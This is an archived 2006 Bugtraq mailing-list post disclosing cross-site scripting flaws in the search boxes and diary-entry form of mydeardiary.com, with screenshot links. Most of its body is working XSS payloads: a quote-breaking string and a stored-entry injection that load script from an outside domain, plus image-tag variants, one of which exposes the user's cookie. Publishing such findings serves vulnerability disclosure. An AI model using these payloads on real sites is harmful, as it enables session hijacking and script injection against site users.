[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060612073138.27291.qmail@securityfocus.com>
Date: 12 Jun 2006 07:31:38 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Mydeardiary.com - XSS
Mydeardiary.com
Homepage:
http://www.mydeardiary.com
Effected files:
search input boxes
Adding new diary entries
--------------------------------------
We create our XSS example by ending quotes with tags before and after:
">">">'><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<"<"<"
Screenshots:
http://www.youfucktard.com/xsp/mydear1.jpg
http://www.youfucktard.com/xsp/mydear2.jpg
------------------------------------
Adding new diary entries XSS vuln:
In the main inputboxof adding a new entry, we can simply put: <SCRIPT SRC=http://youfucktard.com/xs.js></SCRIPT>
to create our XSS example. No filtering needed. When viewing the entry, no popup will occur, but when you go back
and save the entry again then view the entry, you'll see it.
Screenshots:
http://www.youfucktard.com/xsp/mydear3.jpg
http://www.youfucktard.com/xsp/mydear4.jpg
http://www.youfucktard.com/xsp/mydear5.jpg
http://www.youfucktard.com/xsp/mydear6.jpg
Now, to get the popup when viewing the entry instead of just when editing it, we can use <img> tags instead of script
tags:
<IMG SRC=javascript:alert('XSS')>
or try:
<IMG SRC=javascript:document.write(document.cookie)>
Powered by blists - more mailing lists